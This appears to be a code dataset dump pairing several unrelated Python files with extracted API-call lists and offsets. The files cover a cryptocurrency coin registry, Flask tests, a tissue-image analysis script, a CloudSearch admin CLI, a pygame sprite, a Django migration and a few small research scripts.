return "{}_wallet".format(self.coin_name) @property def account_table_name(self): return "{}_account".format(self.coin_name) @property def address_table_name(self): return "{}_address".format(self.coin_name) @property def transaction_table_name(self): return "{}_transaction".format(self.coin_name) @property def network_transaction_table_name(self): return "{}_network_transaction".format(self.coin_name) def _lazy_initialize_class_ref(self, name, dotted_name): val = getattr(self, name, None) if val: return val else: val = resolve(dotted_name) setattr(self, name, val) return val class Coin: """Describe one cryptocurrency setup. Binds cryptocurrency to its backend and database models. We also carry a flag if we are running in testnet or not. This affects address validation. """ def __init__(self, coin_description, backend=None, max_confirmation_count=15, testnet=False): """Create a binding between asset models and backend. :param coin_description: :py:class:`cryptoassets.core.coin.registry.CoinModelDescription` :param testnet: Are we running a testnet node or real node. :param backend: :py:class:`cryptoassets.core.backend.base.CoinBackend` """ assert isinstance(coin_description, CoinModelDescription) self.coin_description = coin_description #: Subclass of :py:class:`cryptoassets.core.backend.base.CoinBackend`. self.backend = None #: Lowercase acronym name of this asset self.name = None #: This is how many confirmations ``tools.confirmationupdate`` tracks for each network transactions, both incoming and outgoing, until we consider it "closed" and stop polling backend for updates. self.max_confirmation_count = max_confirmation_count self.testnet = testnet @property def address_model(self): """Property to get SQLAlchemy model for address of this cryptoasset. Subclass of :py:class:`cryptoassets.core.models.GenericAddress`. """ return self.coin_description.Address @property def transaction_model(self): """Property to get SQLAlchemy model for transaction of this cryptoasset. Subclass of :py:class:`cryptoassets.core.models.GenericTransaction`. """ return self.coin_description.Transaction @property def account_model(self): """Property to get SQLAlchemy model for account of this cryptoasset. Subclass of :py:class:`cryptoassets.core.models.GenericAccount`. """ return self.coin_description.Account @property def wallet_model(self): """Property to get SQLAlchemy model for account of this cryptoasset. Subclass of :py:class:`cryptoassets.core.models.GenericWallet`. """ return self.coin_description.Wallet @property def network_transaction_model(self): """Property to get SQLAlchemy model for account of this cryptoasset. Subclass of :py:class:`cryptoassets.core.models.GenericWallet`. """ return self.coin_description.NetworkTransaction def validate_address(self, address): """Check the address validy against current network. :return: True if given address is valid. """ return self.coin_description.address_validator.validate_address(address, self.testnet) class CoinRegistry: """Holds data of set up cryptocurrencies. Usually you access this through :py:attr:`cryptoasssets.core.app.CryptoassetsApp.coins` instance. Example:: cryptoassets_app = CryptoassetsApp() # ... setup ... bitcoin = cryptoassets_app.coins.get("btc) print("We are running bitcoin with backend {}".format(bitcoin.backend)) """ def __init__(self): self.coins = {} def register(self, name, coin): self.coins[name] = coin # Setup backref coin.name = name def all(self): """Get all registered coin models. :return: List of tuples(coin name, Coin) """ return self.coins.items() def get(self, name): """Return coin setup data by its acronym name. :param name: All lowercase, e.g. ``btc``. """ return self.coins.get(name)
[ "zope.dottedname.resolve.resolve" ]
[((3189, 3209), 'zope.dottedname.resolve.resolve', 'resolve', (['dotted_name'], {}), '(dotted_name)\n', (3196, 3209), False, 'from zope.dottedname.resolve import resolve\n')]
import json import unittest from unittest.mock import patch from app import app from exceptions import InvalidDateFormat from tests.mocks import FakeResponse class TestFlaskApp(unittest.TestCase): def setUp(self): self._app = app self._app.config.update({ "TESTING": True }) def test_home_page_should_return_expected_message(self): with self._app.test_client() as test_client: expectedResponse = FakeResponse( data=b"Welcome to Calendar App. Please visit url: 'hostname:port/date' to try it.", status_code=200) # Hitting home page actualResponse = test_client.get('/') self.assertEqual(expectedResponse.status_code, actualResponse.status_code) self.assertEqual(expectedResponse.data, actualResponse.data) @patch("app.getDateMatrix") def test_date_page_should_return_expected_message_for_valid_date(self, stubGetDateMatrix): dummyDate = "2022-02-27" expectedDateMatrix = b"[[30, 31, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11, 12], [13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26], [27, 28, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11, 12]]" stubGetDateMatrix.return_value = json.loads( expectedDateMatrix.decode()) expectedResponse = FakeResponse( data=expectedDateMatrix, status_code=200) with self._app.test_client() as test_client: # Hitting home page actualResponse = test_client.get(f'/{dummyDate}') self.assertEqual(expectedResponse.status_code, actualResponse.status_code) self.assertEqual(expectedResponse.data, actualResponse.data) @patch("app.getDateMatrix") def test_date_page_should_return_400_for_invalid_date(self, stubGetDateMatrix): dummyDate = "2022-02-27" stubGetDateMatrix.side_effect = InvalidDateFormat( "unittest-invalid-date") expectedResponse = FakeResponse( data="unittest-invalid-date", status_code=400) with self._app.test_client() as test_client: # Hitting home page actualResponse = test_client.get(f'/{dummyDate}') self.assertEqual(expectedResponse.status_code, actualResponse.status_code) self.assertEqual(expectedResponse.data, actualResponse.data.decode()) @patch("app.getDateMatrix") def test_date_page_should_return_500_for_unexpected_server_side_error(self, stubGetDateMatrix): dummyDate = "2022-02-27" stubGetDateMatrix.side_effect = Exception( "unittest-server-side-exception") expectedResponse = FakeResponse( data="Server side issue", status_code=500) with self._app.test_client() as test_client: # Hitting home page actualResponse = test_client.get(f'/{dummyDate}') self.assertEqual(expectedResponse.status_code, actualResponse.status_code) self.assertEqual(expectedResponse.data, actualResponse.data.decode()) if __name__ == "__main__": unittest.main()
[ "unittest.main", "unittest.mock.patch", "tests.mocks.FakeResponse", "exceptions.InvalidDateFormat" ]
[((875, 901), 'unittest.mock.patch', 'patch', (['"""app.getDateMatrix"""'], {}), "('app.getDateMatrix')\n", (880, 901), False, 'from unittest.mock import patch\n'), ((1758, 1784), 'unittest.mock.patch', 'patch', (['"""app.getDateMatrix"""'], {}), "('app.getDateMatrix')\n", (1763, 1784), False, 'from unittest.mock import patch\n'), ((2480, 2506), 'unittest.mock.patch', 'patch', (['"""app.getDateMatrix"""'], {}), "('app.getDateMatrix')\n", (2485, 2506), False, 'from unittest.mock import patch\n'), ((3242, 3257), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3255, 3257), False, 'import unittest\n'), ((1346, 1400), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': 'expectedDateMatrix', 'status_code': '(200)'}), '(data=expectedDateMatrix, status_code=200)\n', (1358, 1400), False, 'from tests.mocks import FakeResponse\n'), ((1942, 1984), 'exceptions.InvalidDateFormat', 'InvalidDateFormat', (['"""unittest-invalid-date"""'], {}), "('unittest-invalid-date')\n", (1959, 1984), False, 'from exceptions import InvalidDateFormat\n'), ((2025, 2084), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': '"""unittest-invalid-date"""', 'status_code': '(400)'}), "(data='unittest-invalid-date', status_code=400)\n", (2037, 2084), False, 'from tests.mocks import FakeResponse\n'), ((2764, 2819), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': '"""Server side issue"""', 'status_code': '(500)'}), "(data='Server side issue', status_code=500)\n", (2776, 2819), False, 'from tests.mocks import FakeResponse\n'), ((465, 588), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': 'b"Welcome to Calendar App. Please visit url: \'hostname:port/date\' to try it."', 'status_code': '(200)'}), '(data=\n b"Welcome to Calendar App. Please visit url: \'hostname:port/date\' to try it."\n , status_code=200)\n', (477, 588), False, 'from tests.mocks import FakeResponse\n')]
# Import Required Modules import os import argparse import numpy as np import pandas as pd import reducers as r from tqdm import tqdm from skimage.io import imread ############################################################################## DEFAULT_INPUT_FOLDER = '.../' DEFAULT_OUTPUT_FOLDER = '.../' DEFAULT_SURVIVAL_RATE_FILE = 'GBM_Logs.csv' DEFAULT_IMAGE_SHAPE = (1024, 1024, 3) SURVIVAL_RATE_FILE_HEADER_NAMES = [ "number", r.PATIENT_ID, "survival_rate_days", "survival_rate_months", "age_years", "primary_diagnosis", ] ENCODINGS = [ { r.PIXEL_TYPE: "Leading_Edge_LE_(Teal_or_Blue_Areas)", r.PIXEL_VALUE: (33, 143, 166), }, { r.PIXEL_TYPE: "Infiltrating_Tumor_IT_(Purple_Areas)", r.PIXEL_VALUE: (210, 5, 208) }, { r.PIXEL_TYPE: "Cellular_Tumor_CT_(Green_Areas)", r.PIXEL_VALUE: (5, 208, 4) }, { r.PIXEL_TYPE: "Necrosis_CTne_(Black_Areas)", r.PIXEL_VALUE: (5, 5, 5) }, { r.PIXEL_TYPE: "Perinecrotic_Zone_CTpnz_(Light_Blue_Areas)", r.PIXEL_VALUE: (37, 209, 247) }, { r.PIXEL_TYPE: "Pseudopalisading_Cells_Around_Necrosis_CTpan_(Sea_Green_Areas)", r.PIXEL_VALUE: (6, 208, 170) }, { r.PIXEL_TYPE: "Microvascular_Proliferation_CTmvp_(Red_Areas)", r.PIXEL_VALUE: (255, 102, 0) }, { r.PIXEL_TYPE: "Background", r.PIXEL_VALUE: (255, 255, 255) } ] def run( input_folder, output_folder, dry_run, verbose, ): if not os.path.exists(input_folder): raise Exception('Input directory must exist: "{input_folder}"'.format(input_folder=input_folder)) if not os.path.exists(output_folder): if verbose: print('Creating output directory "{output_folder}"'.format(output_folder=output_folder)) if not dry_run: os.makedirs(output_folder, exist_ok=True) survival_rate_file = os.path.join(input_folder, DEFAULT_SURVIVAL_RATE_FILE) if not os.path.exists(survival_rate_file): raise Exception('Survival rate file must exist: "{survival_rate_file}"'.format(survival_rate_file=survival_rate_file)) survival_rate_per_patient = pd.read_csv(survival_rate_file, header=0, names=SURVIVAL_RATE_FILE_HEADER_NAMES)[[r.PATIENT_ID, 'survival_rate_days', 'survival_rate_months']] average_pixel_type_per_patient = pd.DataFrame() average_pixel_type_per_patient_reducer = r.AveragePixelTypePerPatientReducer(ENCODINGS) for patient_id in tqdm(os.listdir(input_folder), total = len(os.listdir(input_folder))): patient_folder = os.path.join(input_folder, patient_id) if os.path.isdir(patient_folder): patient_tissue_blocks = np.zeros((len(os.listdir(patient_folder)),) + DEFAULT_IMAGE_SHAPE) for i, patient_tissue_block in enumerate(os.listdir(patient_folder)): patient_tissue_block_file = os.path.join(patient_folder, patient_tissue_block) patient_tissue_blocks[i, :, :, :] = imread(patient_tissue_block_file) tissue_blocks_by_patient_id = pd.DataFrame([ { r.PATIENT_ID: patient_id, r.SEGMENTATION: patient_tissue_blocks } ]) _average_pixel_type_per_patient = average_pixel_type_per_patient_reducer \ .calculate_average_pixel_type_per_patient(tissue_blocks_by_patient_id) average_pixel_type_per_patient = average_pixel_type_per_patient.append(_average_pixel_type_per_patient) average_pixel_type_per_patient = average_pixel_type_per_patient.drop('Background', axis=1) average_pixel_type_per_patient \ .merge(survival_rate_per_patient, how="left", on=r.PATIENT_ID) \ .to_csv(output_folder + 'average_pixel_value_per_patient.csv', index=False) if __name__ == '__main__': arg_parser = argparse.ArgumentParser('Computers Average Pixel Values Per Patient') arg_parser.add_argument("--input-folder", default=DEFAULT_INPUT_FOLDER) arg_parser.add_argument("--output-folder", default=DEFAULT_OUTPUT_FOLDER) arg_parser.add_argument("--dry-run", action='store_true') arg_parser.add_argument("--verbose", action='store_true') args = arg_parser.parse_args() run(input_folder=args.input_folder, output_folder=args.output_folder, dry_run=args.dry_run, verbose=args.verbose)
[ "os.path.exists", "os.listdir", "argparse.ArgumentParser", "pandas.read_csv", "os.makedirs", "os.path.join", "skimage.io.imread", "os.path.isdir", "reducers.AveragePixelTypePerPatientReducer", "pandas.DataFrame" ]
[((1974, 2028), 'os.path.join', 'os.path.join', (['input_folder', 'DEFAULT_SURVIVAL_RATE_FILE'], {}), '(input_folder, DEFAULT_SURVIVAL_RATE_FILE)\n', (1986, 2028), False, 'import os\n'), ((2416, 2430), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2428, 2430), True, 'import pandas as pd\n'), ((2476, 2522), 'reducers.AveragePixelTypePerPatientReducer', 'r.AveragePixelTypePerPatientReducer', (['ENCODINGS'], {}), '(ENCODINGS)\n', (2511, 2522), True, 'import reducers as r\n'), ((3925, 3994), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Computers Average Pixel Values Per Patient"""'], {}), "('Computers Average Pixel Values Per Patient')\n", (3948, 3994), False, 'import argparse\n'), ((1572, 1600), 'os.path.exists', 'os.path.exists', (['input_folder'], {}), '(input_folder)\n', (1586, 1600), False, 'import os\n'), ((1719, 1748), 'os.path.exists', 'os.path.exists', (['output_folder'], {}), '(output_folder)\n', (1733, 1748), False, 'import os\n'), ((2040, 2074), 'os.path.exists', 'os.path.exists', (['survival_rate_file'], {}), '(survival_rate_file)\n', (2054, 2074), False, 'import os\n'), ((2236, 2321), 'pandas.read_csv', 'pd.read_csv', (['survival_rate_file'], {'header': '(0)', 'names': 'SURVIVAL_RATE_FILE_HEADER_NAMES'}), '(survival_rate_file, header=0, names=SURVIVAL_RATE_FILE_HEADER_NAMES\n )\n', (2247, 2321), True, 'import pandas as pd\n'), ((2550, 2574), 'os.listdir', 'os.listdir', (['input_folder'], {}), '(input_folder)\n', (2560, 2574), False, 'import os\n'), ((2641, 2679), 'os.path.join', 'os.path.join', (['input_folder', 'patient_id'], {}), '(input_folder, patient_id)\n', (2653, 2679), False, 'import os\n'), ((2691, 2720), 'os.path.isdir', 'os.path.isdir', (['patient_folder'], {}), '(patient_folder)\n', (2704, 2720), False, 'import os\n'), ((1907, 1948), 'os.makedirs', 'os.makedirs', (['output_folder'], {'exist_ok': '(True)'}), '(output_folder, exist_ok=True)\n', (1918, 1948), False, 'import os\n'), ((3130, 3215), 'pandas.DataFrame', 'pd.DataFrame', (['[{r.PATIENT_ID: patient_id, r.SEGMENTATION: patient_tissue_blocks}]'], {}), '([{r.PATIENT_ID: patient_id, r.SEGMENTATION:\n patient_tissue_blocks}])\n', (3142, 3215), True, 'import pandas as pd\n'), ((2588, 2612), 'os.listdir', 'os.listdir', (['input_folder'], {}), '(input_folder)\n', (2598, 2612), False, 'import os\n'), ((2878, 2904), 'os.listdir', 'os.listdir', (['patient_folder'], {}), '(patient_folder)\n', (2888, 2904), False, 'import os\n'), ((2951, 3001), 'os.path.join', 'os.path.join', (['patient_folder', 'patient_tissue_block'], {}), '(patient_folder, patient_tissue_block)\n', (2963, 3001), False, 'import os\n'), ((3054, 3087), 'skimage.io.imread', 'imread', (['patient_tissue_block_file'], {}), '(patient_tissue_block_file)\n', (3060, 3087), False, 'from skimage.io import imread\n'), ((2772, 2798), 'os.listdir', 'os.listdir', (['patient_folder'], {}), '(patient_folder)\n', (2782, 2798), False, 'import os\n')]
# -*- coding: utf-8 -*- """ """ import os #import codecs import logging import ConfigParser import cmdln import requests from nozama.cloudsearch.client.rest import CloudsearchService class AdminCmds(cmdln.Cmdln): """Usage: {name}-admin -c / --config <admin.ini> SUBCOMMAND [ARGS...] {name}-admin help SUBCOMMAND ${command_list} ${help_list} """ # this is also used as the section to get settings from. name = "cloudsearch-admin" def __init__(self, *args, **kwargs): cmdln.Cmdln.__init__(self, *args, **kwargs) self.log = logging.getLogger("%s.AdminCmds" % __name__) def get_optparser(self): """Parser for global options (that are not specific to a subcommand). """ optparser = cmdln.CmdlnOptionParser(self) optparser.add_option( '-c', '--config', action='store', dest="config_filename", default="admin.ini", help='The global config file %default' ) return optparser def postoptparse(self): """runs after parsing global options""" @property def config(self): """Return a config instance when called. Implement file change and reloading here? """ cfg_filename = self.options.config_filename rc = {} if os.path.isfile(cfg_filename): config = ConfigParser.ConfigParser() self.log.debug("config: recovering from <%s>" % cfg_filename) config.read(cfg_filename) rc = dict(config.items(self.name)) else: self.log.warn( "confg: file not found <%s> using defaults." % cfg_filename ) if 'url' not in rc: rc['url'] = "http://localhost:63833" return rc def do_ping(self, subcmd, opts): """${cmd_name}: Check if the Latchpony REST Service is running. The URL for the service is read from the configuration file. ${cmd_usage} ${cmd_option_list} """ cfg = self.config lp_service_url = cfg['url'] self.log.debug("ping: URL <%s>" % lp_service_url) lps = CloudsearchService() try: result = lps.ping() except requests.exceptions.ConnectionError: self.log.error("Unable to connect to cloudsearch service.") else: self.log.info("Connected to cloudsearch service OK: %s" % result)
[ "logging.getLogger", "ConfigParser.ConfigParser", "os.path.isfile", "nozama.cloudsearch.client.rest.CloudsearchService", "cmdln.Cmdln.__init__", "cmdln.CmdlnOptionParser" ]
[((525, 568), 'cmdln.Cmdln.__init__', 'cmdln.Cmdln.__init__', (['self', '*args'], {}), '(self, *args, **kwargs)\n', (545, 568), False, 'import cmdln\n'), ((588, 632), 'logging.getLogger', 'logging.getLogger', (["('%s.AdminCmds' % __name__)"], {}), "('%s.AdminCmds' % __name__)\n", (605, 632), False, 'import logging\n'), ((773, 802), 'cmdln.CmdlnOptionParser', 'cmdln.CmdlnOptionParser', (['self'], {}), '(self)\n', (796, 802), False, 'import cmdln\n'), ((1343, 1371), 'os.path.isfile', 'os.path.isfile', (['cfg_filename'], {}), '(cfg_filename)\n', (1357, 1371), False, 'import os\n'), ((2187, 2207), 'nozama.cloudsearch.client.rest.CloudsearchService', 'CloudsearchService', ([], {}), '()\n', (2205, 2207), False, 'from nozama.cloudsearch.client.rest import CloudsearchService\n'), ((1394, 1421), 'ConfigParser.ConfigParser', 'ConfigParser.ConfigParser', ([], {}), '()\n', (1419, 1421), False, 'import ConfigParser\n')]
import pygame black = (0, 0, 0) white = (255, 255, 255) grey = (192, 192, 192) dark_grey = (48, 48, 48) red = (255, 0, 0) blue = (0, 0, 255) green = (0, 255, 0) pygame.init() screen = pygame.display.set_mode((300, 300)) class Text(pygame.sprite.Sprite): def __init__(self, group, text, size, color, width, height): # Call the parent class (Sprite) constructor pygame.sprite.Sprite.__init__(self) self.font = pygame.font.SysFont("Arial", size) self.textSurf = self.font.render(text, 1, color) self.image = pygame.Surface((width, height)) W = self.textSurf.get_width() H = self.textSurf.get_height() self.image.blit(self.textSurf, [width/2 - W/2, height/2 - H/2]) # class Text(pygame.sprite.Sprite): # def __init__(self, text, size, color, font=None, **kwargs): # super(Text, self).__init__() # self.color = color # self.font = pygame.font.Font(font, size) # self.kwargs = kwargs # self.set(text) # def set(self, text): # self.image = self.font.render(str(text), 1, self.color) # self.rect = self.image.get_rect(**self.kwargs) group = pygame.sprite.LayeredUpdates() Text(group, "Coba", 36, blue, 60, 60) ## Code tambahan atau tester # fontSmall = pygame.font.Font('freesansbold.ttf', 16) # tPlayer1 = fontSmall.render('PLAYER1', True, green, blue) #(the text, True, text colour, background color) # tPlayer1R = tPlayer1.get_rect() # tPlayer1R.center = (100, 100) run = True while run: for e in pygame.event.get(): if e.type ==pygame.QUIT: run = False screen.fill((0,0,0)) # screen.blit(tPlayer1, tPlayer1R) group.update() group.draw(screen) pygame.display.flip()
[ "pygame.sprite.LayeredUpdates", "pygame.init", "pygame.event.get", "pygame.Surface", "pygame.display.set_mode", "pygame.display.flip", "pygame.sprite.Sprite.__init__", "pygame.font.SysFont" ]
[((162, 175), 'pygame.init', 'pygame.init', ([], {}), '()\n', (173, 175), False, 'import pygame\n'), ((185, 220), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(300, 300)'], {}), '((300, 300))\n', (208, 220), False, 'import pygame\n'), ((1174, 1204), 'pygame.sprite.LayeredUpdates', 'pygame.sprite.LayeredUpdates', ([], {}), '()\n', (1202, 1204), False, 'import pygame\n'), ((1541, 1559), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (1557, 1559), False, 'import pygame\n'), ((1728, 1749), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (1747, 1749), False, 'import pygame\n'), ((385, 420), 'pygame.sprite.Sprite.__init__', 'pygame.sprite.Sprite.__init__', (['self'], {}), '(self)\n', (414, 420), False, 'import pygame\n'), ((442, 476), 'pygame.font.SysFont', 'pygame.font.SysFont', (['"""Arial"""', 'size'], {}), "('Arial', size)\n", (461, 476), False, 'import pygame\n'), ((555, 586), 'pygame.Surface', 'pygame.Surface', (['(width, height)'], {}), '((width, height))\n', (569, 586), False, 'import pygame\n')]
# Generated by Django 3.2.7 on 2021-10-06 05:59 import contact.models.social_links from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='ContactForm', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('create_date', models.DateTimeField(auto_now_add=True, verbose_name='Created At')), ('modified_date', models.DateTimeField(auto_now=True, verbose_name='Modified At')), ('is_deleted', models.BooleanField(default=False, verbose_name='Is Instance marked deleted')), ('is_active', models.BooleanField(default=True, verbose_name='Is Instance marked Active')), ('name', models.CharField(max_length=32, verbose_name='Name')), ('email', models.EmailField(blank=True, max_length=254, null=True, verbose_name='Email')), ('contact_number', models.CharField(blank=True, max_length=32, null=True, verbose_name='Contact number')), ('message', models.TextField(verbose_name='Message')), ], options={ 'verbose_name': 'Contact Form', 'verbose_name_plural': 'Contact Forms', }, ), migrations.CreateModel( name='SocialLink', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('create_date', models.DateTimeField(auto_now_add=True, verbose_name='Created At')), ('modified_date', models.DateTimeField(auto_now=True, verbose_name='Modified At')), ('is_deleted', models.BooleanField(default=False, verbose_name='Is Instance marked deleted')), ('is_active', models.BooleanField(default=True, verbose_name='Is Instance marked Active')), ('name', models.CharField(max_length=32, verbose_name='Type of notification')), ('image', models.ImageField(upload_to=contact.models.social_links.upload_to, verbose_name='Image')), ], options={ 'verbose_name': 'Social link', 'verbose_name_plural': 'Social links', }, ), ]
[ "django.db.models.EmailField", "django.db.models.TextField", "django.db.models.BooleanField", "django.db.models.ImageField", "django.db.models.BigAutoField", "django.db.models.DateTimeField", "django.db.models.CharField" ]
[((342, 438), 'django.db.models.BigAutoField', 'models.BigAutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (361, 438), False, 'from django.db import migrations, models\n'), ((469, 535), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""Created At"""'}), "(auto_now_add=True, verbose_name='Created At')\n", (489, 535), False, 'from django.db import migrations, models\n'), ((572, 635), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)', 'verbose_name': '"""Modified At"""'}), "(auto_now=True, verbose_name='Modified At')\n", (592, 635), False, 'from django.db import migrations, models\n'), ((669, 746), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'verbose_name': '"""Is Instance marked deleted"""'}), "(default=False, verbose_name='Is Instance marked deleted')\n", (688, 746), False, 'from django.db import migrations, models\n'), ((779, 854), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""Is Instance marked Active"""'}), "(default=True, verbose_name='Is Instance marked Active')\n", (798, 854), False, 'from django.db import migrations, models\n'), ((882, 934), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(32)', 'verbose_name': '"""Name"""'}), "(max_length=32, verbose_name='Name')\n", (898, 934), False, 'from django.db import migrations, models\n'), ((963, 1041), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)', 'max_length': '(254)', 'null': '(True)', 'verbose_name': '"""Email"""'}), "(blank=True, max_length=254, null=True, verbose_name='Email')\n", (980, 1041), False, 'from django.db import migrations, models\n'), ((1079, 1169), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(32)', 'null': '(True)', 'verbose_name': '"""Contact number"""'}), "(blank=True, max_length=32, null=True, verbose_name=\n 'Contact number')\n", (1095, 1169), False, 'from django.db import migrations, models\n'), ((1195, 1235), 'django.db.models.TextField', 'models.TextField', ([], {'verbose_name': '"""Message"""'}), "(verbose_name='Message')\n", (1211, 1235), False, 'from django.db import migrations, models\n'), ((1512, 1608), 'django.db.models.BigAutoField', 'models.BigAutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (1531, 1608), False, 'from django.db import migrations, models\n'), ((1639, 1705), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""Created At"""'}), "(auto_now_add=True, verbose_name='Created At')\n", (1659, 1705), False, 'from django.db import migrations, models\n'), ((1742, 1805), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)', 'verbose_name': '"""Modified At"""'}), "(auto_now=True, verbose_name='Modified At')\n", (1762, 1805), False, 'from django.db import migrations, models\n'), ((1839, 1916), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'verbose_name': '"""Is Instance marked deleted"""'}), "(default=False, verbose_name='Is Instance marked deleted')\n", (1858, 1916), False, 'from django.db import migrations, models\n'), ((1949, 2024), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""Is Instance marked Active"""'}), "(default=True, verbose_name='Is Instance marked Active')\n", (1968, 2024), False, 'from django.db import migrations, models\n'), ((2052, 2120), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(32)', 'verbose_name': '"""Type of notification"""'}), "(max_length=32, verbose_name='Type of notification')\n", (2068, 2120), False, 'from django.db import migrations, models\n'), ((2149, 2241), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': 'contact.models.social_links.upload_to', 'verbose_name': '"""Image"""'}), "(upload_to=contact.models.social_links.upload_to,\n verbose_name='Image')\n", (2166, 2241), False, 'from django.db import migrations, models\n')]
from pymir.analytics.key_detection.musicnet.ml.note_sequence.base import knn import argparse import textwrap def compute(k=1): """ Base model of key detection for Musicnet metadata based in TF-IDF and KNN """ knn.compute(k=k) def run(): parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent(compute.__doc__)) parser.add_argument( '--k', help='Number of Neighbours KNN', type=int, default=1, required=False) parser.add_argument( '--ngram_size', help='Size of ngrams', type=int, default=5, required=False) args, extra_params = parser.parse_known_args() knn.compute(k=args.k, ngram_size=args.ngram_size)
[ "textwrap.dedent", "pymir.analytics.key_detection.musicnet.ml.note_sequence.base.knn.compute" ]
[((232, 248), 'pymir.analytics.key_detection.musicnet.ml.note_sequence.base.knn.compute', 'knn.compute', ([], {'k': 'k'}), '(k=k)\n', (243, 248), False, 'from pymir.analytics.key_detection.musicnet.ml.note_sequence.base import knn\n'), ((707, 756), 'pymir.analytics.key_detection.musicnet.ml.note_sequence.base.knn.compute', 'knn.compute', ([], {'k': 'args.k', 'ngram_size': 'args.ngram_size'}), '(k=args.k, ngram_size=args.ngram_size)\n', (718, 756), False, 'from pymir.analytics.key_detection.musicnet.ml.note_sequence.base import knn\n'), ((379, 411), 'textwrap.dedent', 'textwrap.dedent', (['compute.__doc__'], {}), '(compute.__doc__)\n', (394, 411), False, 'import textwrap\n')]
#!/usr/bin/python import sys; import re; import slate; import pickle; import nltk; import glob; import os; def main(): if len(sys.argv) < 2: sys.exit('Usage: %s search-term' % sys.argv[0]) targets = glob.glob('./*.pdf') for target in targets: print("searching in: " + target) with open(target) as f: doc = slate.PDF(f) for i in range (0,len(doc)): if sys.argv[1].lower() in doc[i].lower(): print("FOUND! in page " + str(i+1)) if __name__ == "__main__": main()
[ "slate.PDF", "glob.glob", "sys.exit" ]
[((214, 234), 'glob.glob', 'glob.glob', (['"""./*.pdf"""'], {}), "('./*.pdf')\n", (223, 234), False, 'import glob\n'), ((155, 202), 'sys.exit', 'sys.exit', (["('Usage: %s search-term' % sys.argv[0])"], {}), "('Usage: %s search-term' % sys.argv[0])\n", (163, 202), False, 'import sys\n'), ((338, 350), 'slate.PDF', 'slate.PDF', (['f'], {}), '(f)\n', (347, 350), False, 'import slate\n')]
import sys, platform, os sys.path.insert(0,'/global/u1/s/spandey/kmeans_radec/') import numpy as np import scipy as sp import scipy.integrate as integrate import scipy.signal as spsg import matplotlib.pyplot as plt import pdb import healpy as hp from astropy.io import fits from kmeans_radec import KMeans, kmeans_sample import time import math from scipy import interpolate import treecorr import pickle as pk import configparser import ast from astropy.io import fits from astropy.coordinates import SkyCoord from astropy import units as u import astropy.constants as const import kmeans_radec import h5py as h5 import argparse import gc sys.path.insert(0,'/global/cfs/cdirs/des/shivamp/cosmosis/y3kp-bias-model/3d_stats/process_measure_data/') import process_cats_class as pcc cosmo_params_dict = {'flat': True, 'H0': 70.0, 'Om0': 0.25, 'Ob0': 0.044, 'sigma8': 0.8, 'ns': 0.95} from nbodykit.lab import HDFCatalog def load_mesh_h5(cat_str, N, box_size): f = HDFCatalog(cat_str) f.attrs['BoxSize'] = box_size return f.to_mesh(Nmesh=N, compensated=True) def ang2eq(theta, phi): ra = phi * 180. / np.pi dec = 90. - theta * 180. / np.pi return ra, dec def eq2ang(ra, dec): phi = ra * np.pi / 180. theta = (np.pi / 2.) - dec * (np.pi / 180.) return theta, phi def get_zmean(zcent,delz,nz_bin): prob_zcent = nz_bin zmean = (np.sum(prob_zcent*zcent*delz))/(np.sum(prob_zcent*delz)) return zmean box_size = 4225.35211 box_size_h = box_size*0.71 N = 3000 # dm_str = '/global/cscratch1/sd/samgolds/gal_cat_24_5.h5' dm_str = '/global/cscratch1/sd/samgolds/dm_cat.h5' mesh_dm = load_mesh_h5(dm_str, N, box_size) mesh_dm_real = mesh_dm.to_real_field() nsp = 10 nbox = int(N/nsp) for j1 in range(nsp): for j2 in range(nsp): for j3 in range(nsp): pk.dump(mesh_dm_real[j1*nbox:(j1+1)*nbox,j2*nbox:(j2+1)*nbox,j3*nbox:(j3+1)*nbox],open('/global/project/projectdirs/m1727/shivamp_lsst/data_set/dm_mesh/mesh_dm_real_Ng3000_fullbox_nsp' + str(nsp) + '_' + str(j1) + '_' + str(j2) + '_' + str(j3) + '.pk', 'wb'))
[ "nbodykit.lab.HDFCatalog", "numpy.sum", "sys.path.insert" ]
